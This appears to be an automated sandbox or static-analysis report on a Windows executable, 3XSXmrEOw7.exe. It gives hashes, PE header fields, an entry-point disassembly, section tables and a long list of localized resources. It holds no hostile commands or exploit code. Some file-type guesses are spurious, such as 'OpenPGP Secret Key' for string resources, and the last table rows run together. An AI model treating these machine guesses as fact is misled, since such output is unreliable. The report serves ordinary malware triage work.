                                                                                                                                            MD5:B3CAB76A555DCC61A1FC843C15FB855B
                                                                                                                                            SHA1:F83C46C8C39716DA7235DFFDD37E146A8F3F641E
                                                                                                                                            SHA-256:83C5993B56589CA2AE0B06B6F145110E36FC4406AF9CFB8ED23493175BE5467C
                                                                                                                                            SHA-512:85CB1F9A0B932E0E4F27FD8E8F2BBA145ACB357516B7A49DCEE8F021D0FBC6B4590BB141CA2849DE15481B1DDB147C2192B57A448AEC32EC9F56D16D1A334A5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A..j...9...9...9...9...9...9...9...9...9..9...9...9...9...9...9...9..9...9...9...9<..9...9j..9..9...9...9...9Rich...9................PE..L.....C.................P...`#.....}V.......`....@..........................p*.............................................t........0...="..........................f..................................H............`...............................text....C.......P.................. ..`.rdata.......`.......`..............@..@.data........@...@...@..............@....rsrc....="..0...@".................@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):6.482858818003191
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:3XSXmrEOw7.exe
                                                                                                                                            File size:2'605'056 bytes
                                                                                                                                            MD5:ddce3b9704d1e4236548b1a458317dd0
                                                                                                                                            SHA1:a48a65dbcba5a65d89688e1b4eac0deef65928c8
                                                                                                                                            SHA256:972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
                                                                                                                                            SHA512:5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86
                                                                                                                                            SSDEEP:49152:WWp/hOxsZI6ezrykdIyfQxPhPR+Wa0WY44:bp/3p8r3fQBhPR+WJl
                                                                                                                                            TLSH:5FC54992A2E9C256F5F26A70D932E6F18526BCA5E935850F63D07D1F3431E818932B33
                                                                                                                                            Icon Hash:83b73111292d65c5
                                                                                                                                            Entrypoint:0x42567d
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:
                                                                                                                                            Time Stamp:0x43A9E2E6 [Wed Dec 21 23:19:02 2005 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:1b45e9b30691181342689639e3f2a9ef
                                                                                                                                            Instruction
                                                                                                                                            push 00000060h
                                                                                                                                            push 0044C9D0h
                                                                                                                                            inc eax
                                                                                                                                            inc ebx
                                                                                                                                            mov eax, 00000000h
                                                                                                                                            inc eax
                                                                                                                                            add eax, ebx
                                                                                                                                            mov eax, edi
                                                                                                                                            call 00007FB3D0884D34h
                                                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                                                            mov esi, esp
                                                                                                                                            mov dword ptr [esi], edi
                                                                                                                                            push esi
                                                                                                                                            call dword ptr [004462D4h]
                                                                                                                                            mov ecx, dword ptr [esi+10h]
                                                                                                                                            mov dword ptr [00480954h], ecx
                                                                                                                                            mov eax, dword ptr [esi+04h]
                                                                                                                                            mov dword ptr [00480960h], eax
                                                                                                                                            mov edx, dword ptr [esi+08h]
                                                                                                                                            mov dword ptr [00480964h], edx
                                                                                                                                            mov esi, dword ptr [esi+0Ch]
                                                                                                                                            and esi, 00007FFFh
                                                                                                                                            mov dword ptr [00480958h], esi
                                                                                                                                            cmp ecx, 02h
                                                                                                                                            je 00007FB3D08A68CEh
                                                                                                                                            or esi, 00008000h
                                                                                                                                            mov dword ptr [00480958h], esi
                                                                                                                                            shl eax, 08h
                                                                                                                                            add eax, edx
                                                                                                                                            mov dword ptr [0048095Ch], eax
                                                                                                                                            xor esi, esi
                                                                                                                                            push esi
                                                                                                                                            mov edi, dword ptr [00446338h]
                                                                                                                                            call 00007FB3D08A80DFh
                                                                                                                                            dec ebp
                                                                                                                                            pop edx
                                                                                                                                            jne 00007FB3D08A68E1h
                                                                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                                                                            add ecx, eax
                                                                                                                                            cmp dword ptr [ecx], 00004550h
                                                                                                                                            jne 00007FB3D08A68D4h
                                                                                                                                            movzx eax, word ptr [ecx+18h]
                                                                                                                                            cmp eax, 0000010Bh
                                                                                                                                            je 00007FB3D08A68E1h
                                                                                                                                            cmp eax, 0000020Bh
                                                                                                                                            je 00007FB3D08A68C7h
                                                                                                                                            mov dword ptr [ebp-1Ch], esi
                                                                                                                                            jmp 00007FB3D08A68E9h
                                                                                                                                            cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                                            jbe 00007FB3D08A68B4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000F8h], esi
                                                                                                                                            jmp 00007FB3D08A68D0h
                                                                                                                                            cmp dword ptr [ecx+74h], 0Eh
                                                                                                                                            jbe 00007FB3D08A68A4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000E8h], esi
                                                                                                                                            setne al
                                                                                                                                            mov dword ptr [ebp-1Ch], eax
                                                                                                                                            Programming Language:
                                                                                                                                            • [ASM] VS2003 (.NET) build 3077
                                                                                                                                            • [ C ] VS2003 (.NET) build 3077
                                                                                                                                            • [C++] VS2003 (.NET) build 3077
                                                                                                                                            • [RES] VS2003 (.NET) build 3077
                                                                                                                                            • [LNK] VS2003 (.NET) build 3077
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x51b74 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x83000 | 0x223dd8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x46600 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4ec80 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x46000 | 0x5f4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x443a4 | 0x45000 | 90bf5d6a9311d62e912522c28783a859 | False | 0.5500629812047102 | data | 6.578965194074808 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x46000 | 0xdc08 | 0xe000 | f035081ac4c7ee86cd6ead176dd1c9bb | False | 0.3834228515625 | data | 5.2366811213048665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x54000 | 0x2e294 | 0x4000 | 8313c86e1a2ce269f3aa390bb3074e9b | False | 0.2427978515625 | data | 2.963596560441913 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x83000 | 0x223dd8 | 0x224000 | 59bade16f1d8419fc75dee42e8a1822f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x86440 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x86574 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_CURSOR | 0x86628 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365
RT_CURSOR | 0x8675c | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715
RT_CURSOR | 0x86890 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x869c4 | 0x134 | data | English | United States | 0.37662337662337664
RT_CURSOR | 0x86af8 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x86c2c | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664
RT_CURSOR | 0x86d60 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0x86e94 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x86fc8 | 0x134 | data | English | United States | 0.44155844155844154
RT_CURSOR | 0x870fc | 0x134 | data | English | United States | 0.4155844155844156
RT_CURSOR | 0x87230 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922
RT_CURSOR | 0x87364 | 0x134 | data | English | United States | 0.2662337662337662
RT_CURSOR | 0x87498 | 0x134 | data | English | United States | 0.2824675324675325
RT_CURSOR | 0x875cc | 0x134 | data | English | United States | 0.3246753246753247
RT_BITMAP | 0x87700 | 0x2e02a | Device independent bitmap graphic, 1472 x 32 x 32, image size 188418, resolution 2834 x 2834 px/m | | | 0.2016895011090004
RT_BITMAP | 0xb572c | 0x42a | Device independent bitmap graphic, 16 x 16 x 32, image size 1026, resolution 2834 x 2834 px/m | | | 0.8236397748592871
RT_BITMAP | 0xb5b58 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | | | 0.5701219512195121
RT_BITMAP | 0xb61c0 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0xb6278 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0xb63bc | 0x44028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | | | 0.2371665087160047
RT_ICON | 0xfa3e4 | 0x45aea | PC bitmap, Windows 3.x format, 36002 x 2 x 37, image size 285759, cbSize 285418, bits offset 54 | | | 0.9950668843590804
RT_ICON | 0x13fed0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | United States | 0.42567567567567566
RT_ICON | 0x13fff8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors | English | United States | 0.260752688172043
RT_MENU | 0x1402e0 | 0xe6 | data | English | United States | 0.6304347826086957
RT_DIALOG | 0x1403c8 | 0x134 | data | English | United States | 0.5844155844155844
RT_DIALOG | 0x1404fc | 0xe8 | data | English | United States | 0.6336206896551724
RT_STRING | 0x1405e4 | 0x378 | data | Chinese | Taiwan | 0.49436936936936937
RT_STRING | 0x14095c | 0x896 | data | Czech | Czech Republic | 0.29754322111010006
RT_STRING | 0x1411f4 | 0x914 | data | Danish | Denmark | 0.2706540447504303
RT_STRING | 0x141b08 | 0x9ec | data | German | Germany | 0.27244094488188975
RT_STRING | 0x1424f4 | 0xa74 | data | Greek | Greece | 0.2705530642750374
RT_STRING | 0x142f68 | 0x922 | data | Finnish | Finland | 0.2523524379811805
RT_STRING | 0x14388c | 0x95e | data | French | France | 0.25312760633861553
RT_STRING | 0x1441ec | 0x68a | data | Hebrew | Israel | 0.3279569892473118
RT_STRING | 0x144878 | 0x8e0 | data | Hungarian | Hungary | 0.2953345070422535
RT_STRING | 0x145158 | 0x8e4 | data | Italian | Italy | 0.2627416520210896
RT_STRING | 0x145a3c | 0x550 | data | Japanese | Japan | 0.35294117647058826
RT_STRING | 0x145f8c | 0x55c | data | Korean | North Korea | 0.39941690962099125
RT_STRING | 0x145f8c | 0x55c | data | Korean | South Korea | 0.39941690962099125
RT_STRING | 0x1464e8 | 0x8e6 | data | Dutch | Netherlands | 0.26733977172958734
RT_STRING | 0x146dd0 | 0x82a | data | Norwegian | Norway | 0.26842105263157895
RT_STRING | 0x1475fc | 0x7ee | data | Polish | Poland | 0.28374384236453204
RT_STRING | 0x147dec | 0xa12 | data | Portuguese | Brazil | 0.24204809930178434
RT_STRING | 0x148800 | 0x7ba | data | Russian | Russia | 0.327098078867543
RT_STRING | 0x148fbc | 0x8fc | data | Swedish | Sweden | 0.25478260869565217
RT_STRING | 0x1498b8 | 0x7e8 | data | Thai | Thailand | 0.3102766798418972
RT_STRING | 0x14a0a0 | 0x3f6 | data | Chinese | China | 0.48520710059171596
RT_STRING | 0x14a498 | 0x954 | data | Portuguese | Portugal | 0.26256281407035176
RT_STRING | 0x14adec | 0x8f2 | data | | | 0.251528384279476
RT_STRING | 0x14b6e0 | 0x8fa | data | English | Canada | 0.24412532637075718
RT_STRING | 0x14bfdc | 0x21c | data | Chinese | Taiwan | 0.6444444444444445
RT_STRING | 0x14c1f8 | 0x3ea | data | Czech | Czech Republic | 0.4431137724550898
RT_STRING | 0x14c5e4 | 0x41e | data | Danish | Denmark | 0.3984819734345351
RT_STRING | 0x14ca04 | 0x512 | AmigaOS bitmap font "o", fc_YSize 25344, 17920 elements, 2nd " ", 3rd "e" | German | Germany | 0.362095531587057
                                                                                                                                            RT_STRING0x14cf180x482dataGreekGreece0.44280762564991333
                                                                                                                                            RT_STRING0x14d39c0x504dataFinnishFinland0.3598130841121495
                                                                                                                                            RT_STRING0x14d8a00x4b6dataFrenchFrance0.3548922056384743
                                                                                                                                            RT_STRING0x14dd580x384dataHebrewIsrael0.4588888888888889
                                                                                                                                            RT_STRING0x14e0dc0x466dataHungarianHungary0.42362344582593253
                                                                                                                                            RT_STRING0x14e5440x43cdataItalianItaly0.3966789667896679
                                                                                                                                            RT_STRING0x14e9800x22edataJapaneseJapan0.6164874551971327
                                                                                                                                            RT_STRING0x14ebb00x240dataKoreanNorth Korea0.6388888888888888
                                                                                                                                            RT_STRING0x14ebb00x240dataKoreanSouth Korea0.6388888888888888
                                                                                                                                            RT_STRING0x14edf00x4e2dataDutchNetherlands0.3424
                                                                                                                                            RT_STRING0x14f2d40x3e0AmigaOS bitmap font "v", fc_YSize 28416, 16640 elements, 2nd "i", 3rd "e"NorwegianNorway0.4112903225806452
                                                                                                                                            RT_STRING0x14f6b40x4acdataPolishPoland0.4080267558528428
                                                                                                                                            RT_STRING0x14fb600x4b0dataPortugueseBrazil0.3858333333333333
                                                                                                                                            RT_STRING0x1500100x5c8dataRussianRussia0.36824324324324326
                                                                                                                                            RT_STRING0x1505d80x41edataSwedishSweden0.3776091081593928
                                                                                                                                            RT_STRING0x1509f80x362dataThaiThailand0.46882217090069284
                                                                                                                                            RT_STRING0x150d5c0x1eadataChineseChina0.7306122448979592
                                                                                                                                            RT_STRING0x150f480x4a6dataPortuguesePortugal0.3815126050420168
                                                                                                                                            RT_STRING0x1513f00x4ecAmigaOS bitmap font "s", fc_YSize 24832, 21760 elements, 2nd "c", 3rd "q"0.3753968253968254
                                                                                                                                            RT_STRING0x1518dc0x3b0dataEnglishCanada0.4014830508474576
                                                                                                                                            RT_STRING0x151c8c0x2c8dataChineseTaiwan0.7780898876404494
                                                                                                                                            RT_STRING0x151f540x6c2dataCzechCzech Republic0.4028901734104046
                                                                                                                                            RT_STRING0x1526180x7ecdataDanishDenmark0.35552268244575935
                                                                                                                                            RT_STRING0x152e040x8c8dataGermanGermany0.33629893238434166
                                                                                                                                            RT_STRING0x1536cc0x926AmigaOS bitmap font "\301\003\255\003\307\003\277\003\275\003 ", fc_YSize 4294948611, 41987 elementsGreekGreece0.3736122971818958
                                                                                                                                            RT_STRING0x153ff40x6a8dataFinnishFinland0.3826291079812207
                                                                                                                                            RT_STRING0x15469c0x818dataFrenchFrance0.3359073359073359
                                                                                                                                            RT_STRING0x154eb40x6e0dataHebrewIsrael0.38238636363636364
                                                                                                                                            RT_STRING0x1555940x750AmigaOS bitmap font "k", fc_YSize 11520, 16640 elements, 2nd " ", 3rd "l"HungarianHungary0.38514957264957267
                                                                                                                                            RT_STRING0x155ce40x7b6dataItalianItaly0.34903748733535966
                                                                                                                                            RT_STRING0x15649c0x3e4dataJapaneseJapan0.5783132530120482
                                                                                                                                            RT_STRING0x1568800x44cdataKoreanNorth Korea0.5636363636363636
                                                                                                                                            RT_STRING0x1568800x44cdataKoreanSouth Korea0.5636363636363636
                                                                                                                                            RT_STRING0x156ccc0x820dataDutchNetherlands0.33557692307692305
                                                                                                                                            RT_STRING0x1574ec0x742AmigaOS bitmap font "j", fc_YSize 30208, 18176 elements, 2nd "r", 3rd "e"NorwegianNorway0.34607104413347684
                                                                                                                                            RT_STRING0x157c300x728dataPolishPoland0.384825327510917
                                                                                                                                            RT_STRING0x1583580x84cdataPortugueseBrazil0.3422787193973635
                                                                                                                                            RT_STRING0x158ba40x6f2dataRussianRussia0.3914510686164229
                                                                                                                                            RT_STRING0x1592980x7b6AmigaOS bitmap font "u", fc_YSize 8192, 19968 elements, 2nd "v", 3rd "e"SwedishSweden0.3601823708206687
                                                                                                                                            RT_STRING0x159a500x658dataThaiThailand0.42549261083743845
                                                                                                                                            RT_STRING0x15a0a80x2e0dataChineseChina0.751358695652174
                                                                                                                                            RT_STRING0x15a3880x770dataPortuguesePortugal0.34558823529411764
                                                                                                                                            RT_STRING0x15aaf80x7b0AmigaOS bitmap font "r", fc_YSize 25856, 16640 elements, 2nd "D", 3rd "e"0.3475609756097561
                                                                                                                                            RT_STRING0x15b2a80x7b6dataEnglishCanada0.3454913880445795
                                                                                                                                            RT_STRING0x15ba600x2d6dataChineseTaiwan0.7851239669421488
                                                                                                                                            RT_STRING0x15bd380x64adataCzechCzech Republic0.45217391304347826
                                                                                                                                            RT_STRING0x15c3840x66cdataDanishDenmark0.40450121654501214
                                                                                                                                            RT_STRING0x15c9f00x6e0Dyalog APL aplcore version 66.0GermanGermany0.4017045454545455
                                                                                                                                            RT_STRING0x15d0d00x718OpenPGP Secret KeyGreekGreece0.43061674008810574
                                                                                                                                            RT_STRING0x15d7e80x63edataFinnishFinland0.4123904881101377
                                                                                                                                            RT_STRING0x15de280x65edataFrenchFrance0.4147239263803681
                                                                                                                                            RT_STRING0x15e4880x5c4dataHebrewIsrael0.45799457994579945
                                                                                                                                            RT_STRING0x15ea4c0x5b0dataHungarianHungary0.45879120879120877
                                                                                                                                            RT_STRING0x15effc0x67cdataItalianItaly0.41566265060240964
                                                                                                                                            RT_STRING0x15f6780x36adataJapaneseJapan0.6601830663615561
                                                                                                                                            RT_STRING0x15f9e40x380dataKoreanNorth Korea0.6662946428571429
                                                                                                                                            RT_STRING0x15f9e40x380dataKoreanSouth Korea0.6662946428571429
                                                                                                                                            RT_STRING0x15fd640x6c0dataDutchNetherlands0.3894675925925926
                                                                                                                                            RT_STRING0x1604240x63adataNorwegianNorway0.397741530740276
                                                                                                                                            RT_STRING0x160a600x5d0dataPolishPoland0.4536290322580645
                                                                                                                                            RT_STRING0x1610300x66adataPortugueseBrazil0.4287454323995128
                                                                                                                                            RT_STRING0x16169c0x550dataRussianRussia0.4625
                                                                                                                                            RT_STRING0x161bec0x60edataSwedishSweden0.4096774193548387
                                                                                                                                            RT_STRING0x1621fc0x500dataThaiThailand0.5046875
                                                                                                                                            RT_STRING0x1626fc0x2c8dataChineseChina0.827247191011236
                                                                                                                                            RT_STRING0x1629c40x608OpenPGP Secret KeyPortuguesePortugal0.4216321243523316
                                                                                                                                            RT_STRING0x162fcc0x664OpenPGP Secret Key0.41503667481662593
                                                                                                                                            RT_STRING0x1636300x5daDOS executable (COM, 0x8C-variant)EnglishCanada0.4205607476635514
                                                                                                                                            RT_STRING0x163c0c0x340AmigaOS bitmap font "~v.zMQ\273\214\013N\011\217\204v", fc_YSize 8192, 2638 elements, 2nd "-\212\356v\004\223\014", 3rd "d"ChineseTaiwan0.6358173076923077
                                                                                                                                            RT_STRING0x163f4c0x6f8dataCzechCzech Republic0.36154708520179374
                                                                                                                                            RT_STRING0x1646440x74cdataDanishDenmark0.3329764453961456
                                                                                                                                            RT_STRING0x164d900x802dataGermanGermany0.3326829268292683
                                                                                                                                            RT_STRING0x1655940x908dataGreekGreece0.3672145328719723
                                                                                                                                            RT_STRING0x165e9c0x77edataFinnishFinland0.35662148070907196
                                                                                                                                            RT_STRING0x16661c0x842dataFrenchFrance0.33349101229895933
                                                                                                                                            RT_STRING0x166e600x626dataHebrewIsrael0.40088945362134687
                                                                                                                                            RT_STRING0x1674880x72adataHungarianHungary0.36150490730643403
                                                                                                                                            RT_STRING0x167bb40x7b8dataItalianItaly0.3350202429149798
                                                                                                                                            RT_STRING0x16836c0x456dataJapaneseJapan0.4846846846846847
                                                                                                                                            RT_STRING0x1687c40x45adataKoreanNorth Korea0.5197486535008977
                                                                                                                                            RT_STRING0x1687c40x45adataKoreanSouth Korea0.5197486535008977
                                                                                                                                            RT_STRING0x168c200x7cedataDutchNetherlands0.3308308308308308
                                                                                                                                            RT_STRING0x1693f00x7a6dataNorwegianNorway0.3202247191011236
                                                                                                                                            RT_STRING0x169b980x698dataPolishPoland0.36729857819905215
                                                                                                                                            RT_STRING0x16a2300x85cdataPortugueseBrazil0.31822429906542055
                                                                                                                                            RT_STRING0x16aa8c0x6b0dataRussianRussia0.3679906542056075
                                                                                                                                            RT_STRING0x16b13c0x6dedataSwedishSweden0.34186575654152446
                                                                                                                                            RT_STRING0x16b81c0x636dataThaiThailand0.3855345911949686
                                                                                                                                            RT_STRING0x16be540x346dataChineseChina0.636038186157518
                                                                                                                                            RT_STRING0x16c19c0x7dedataPortuguesePortugal0.32621648460774577
                                                                                                                                            RT_STRING0x16c97c0x73cdata0.3250539956803456
                                                                                                                                            RT_STRING0x16d0b80x74cdataEnglishCanada0.3217344753747323
                                                                                                                                            RT_STRING0x16d8040x46edataChineseTaiwan0.599647266313933
                                                                                                                                            RT_STRING0x16dc740x7b8dataCzechCzech Republic0.4185222672064777
                                                                                                                                            RT_STRING0x16e42c0x82adataDanishDenmark0.3736842105263158
                                                                                                                                            RT_STRING0x16ec580x868dataGermanGermany0.3712825278810409
                                                                                                                                            RT_STRING0x16f4c00x966dataGreekGreece0.39276807980049877
                                                                                                                                            RT_STRING0x16fe280x954dataFinnishFinland0.36139028475711893
                                                                                                                                            RT_STRING0x17077c0x94cPDP-11 demand-paged pure executable not strippedFrenchFrance0.36512605042016805
                                                                                                                                            RT_STRING0x1710c80x728dataHebrewIsrael0.4170305676855895
                                                                                                                                            RT_STRING0x1717f00x7f8dataHungarianHungary0.3877450980392157
                                                                                                                                            RT_STRING0x171fe80x86adataItalianItaly0.37418755803156917
                                                                                                                                            RT_STRING0x1728540x53edataJapaneseJapan0.5104321907600596
                                                                                                                                            RT_STRING0x172d940x5aedataKoreanNorth Korea0.5281980742778541
                                                                                                                                            RT_STRING0x172d940x5aedataKoreanSouth Korea0.5281980742778541
                                                                                                                                            RT_STRING0x1733440x878dataDutchNetherlands0.3519372693726937
                                                                                                                                            RT_STRING0x173bbc0x7a4dataNorwegianNorway0.37678936605316976
                                                                                                                                            RT_STRING0x1743600x85adataPolishPoland0.3985032740879326
                                                                                                                                            RT_STRING0x174bbc0x8eedataPortugueseBrazil0.36832895888014
                                                                                                                                            RT_STRING0x1754ac0x83adataRussianRussia0.4107312440645774
                                                                                                                                            RT_STRING0x175ce80x7fadataSwedishSweden0.38050930460333005
                                                                                                                                            RT_STRING0x1764e40x738dataThaiThailand0.42045454545454547
                                                                                                                                            RT_STRING0x176c1c0x482dataChineseChina0.6091854419410745
                                                                                                                                            RT_STRING0x1770a00x81adataPortuguesePortugal0.3799421407907425
                                                                                                                                            RT_STRING0x1778bc0x858data0.38436329588014984
                                                                                                                                            RT_STRING0x1781140x7badataEnglishCanada0.3822042467138524
                                                                                                                                            RT_STRING0x1788d00x38dataChineseTaiwan0.6428571428571429
                                                                                                                                            RT_STRING0x1789080x56dataCzechCzech Republic0.6511627906976745
                                                                                                                                            RT_STRING0x1789600x5edataDanishDenmark0.6382978723404256
                                                                                                                                            RT_STRING0x1789c00x56dataGermanGermany0.686046511627907
                                                                                                                                            RT_STRING0x178a180x5adataGreekGreece0.7222222222222222
                                                                                                                                            RT_STRING0x178a740x5edataFinnishFinland0.6382978723404256
                                                                                                                                            RT_STRING0x178ad40x5adataFrenchFrance0.6444444444444445
                                                                                                                                            RT_STRING0x178b300x46dataHebrewIsrael0.7
                                                                                                                                            RT_STRING0x178b780x52dataHungarianHungary0.6341463414634146
                                                                                                                                            RT_STRING0x178bcc0x62dataItalianItaly0.6122448979591837
                                                                                                                                            RT_STRING0x178c300x44dataJapaneseJapan0.6911764705882353
                                                                                                                                            RT_STRING0x178c740x3cdataKoreanNorth Korea0.65
                                                                                                                                            RT_STRING0x178c740x3cdataKoreanSouth Korea0.65
                                                                                                                                            RT_STRING0x178cb00x56dataDutchNetherlands0.6744186046511628
                                                                                                                                            RT_STRING0x178d080x68dataNorwegianNorway0.6826923076923077
                                                                                                                                            RT_STRING0x178d700x96dataPolishPoland0.6466666666666666
                                                                                                                                            RT_STRING0x178e080x5cdataPortugueseBrazil0.6630434782608695
                                                                                                                                            RT_STRING0x178e640x3cdataRussianRussia0.6333333333333333
                                                                                                                                            RT_STRING0x178ea00x5adataSwedishSweden0.6555555555555556
                                                                                                                                            RT_STRING0x178efc0x48dataThaiThailand0.6527777777777778
                                                                                                                                            RT_STRING0x18dfd00x46dataDutchNetherlands0.7428571428571429
                                                                                                                                            RT_STRING0x18e0180x46dataNorwegianNorway0.7428571428571429
                                                                                                                                            RT_STRING0x18e0600x46dataPolishPoland0.7428571428571429
                                                                                                                                            RT_STRING0x18e0a80x46dataPortugueseBrazil0.7428571428571429
                                                                                                                                            RT_STRING0x18e0f00x46dataRussianRussia0.7428571428571429
                                                                                                                                            RT_STRING0x18e1380x46dataSwedishSweden0.7428571428571429
                                                                                                                                            RT_STRING0x18e1800x46dataThaiThailand0.7428571428571429
                                                                                                                                            RT_STRING0x18e1c80x46dataChineseChina0.7428571428571429
                                                                                                                                            RT_STRING0x18e2100x46dataPortuguesePortugal0.7428571428571429
                                                                                                                                            RT_STRING0x18e2580x46data0.7428571428571429
                                                                                                                                            RT_STRING0x18e2a00x46dataEnglishCanada0.7428571428571429
                                                                                                                                            RT_STRING0x18e2e80x1f8dataChineseTaiwan0.36706349206349204
                                                                                                                                            RT_STRING0x18e4e00x1f8dataCzechCzech Republic0.36706349206349204
                                                                                                                                            RT_STRING0x18e6d80x1f8dataDanishDenmark0.36706349206349204
                                                                                                                                            RT_STRING0x18e8d00x1f8dataGermanGermany0.36706349206349204
                                                                                                                                            RT_STRING0x18eac80x1f8dataGreekGreece0.36706349206349204
                                                                                                                                            RT_STRING0x18ecc00x1f8dataFinnishFinland0.36706349206349204
                                                                                                                                            RT_STRING0x18eeb80x1f8dataFrenchFrance0.36706349206349204
                                                                                                                                            RT_STRING0x18f0b00x1f8dataHebrewIsrael0.36706349206349204
                                                                                                                                            RT_STRING0x18f2a80x1f8dataHungarianHungary0.36706349206349204
                                                                                                                                            RT_STRING0x18f4a00x1f8dataItalianItaly0.36706349206349204
                                                                                                                                            RT_STRING0x18f6980x1f8dataJapaneseJapan0.36706349206349204
                                                                                                                                            RT_STRING0x18f8900x1f8dataKoreanNorth Korea0.36706349206349204
                                                                                                                                            RT_STRING0x18f8900x1f8dataKoreanSouth Korea0.36706349206349204
                                                                                                                                            RT_STRING0x18fa880x1f8dataDutchNetherlands0.36706349206349204
                                                                                                                                            RT_STRING0x18fc800x1f8dataNorwegianNorway0.36706349206349204
                                                                                                                                            RT_STRING0x18fe780x1f8dataPolishPoland0.36706349206349204
                                                                                                                                            RT_STRING0x1900700x1f8dataPortugueseBrazil0.36706349206349204
                                                                                                                                            RT_STRING0x1902680x1f8dataRussianRussia0.36706349206349204
                                                                                                                                            RT_STRING0x1904600x1f8dataSwedishSweden0.36706349206349204
                                                                                                                                            RT_STRING0x1906580x1f8dataThaiThailand0.36706349206349204
                                                                                                                                            RT_STRING0x1908500x1f8dataChineseChina0.36706349206349204
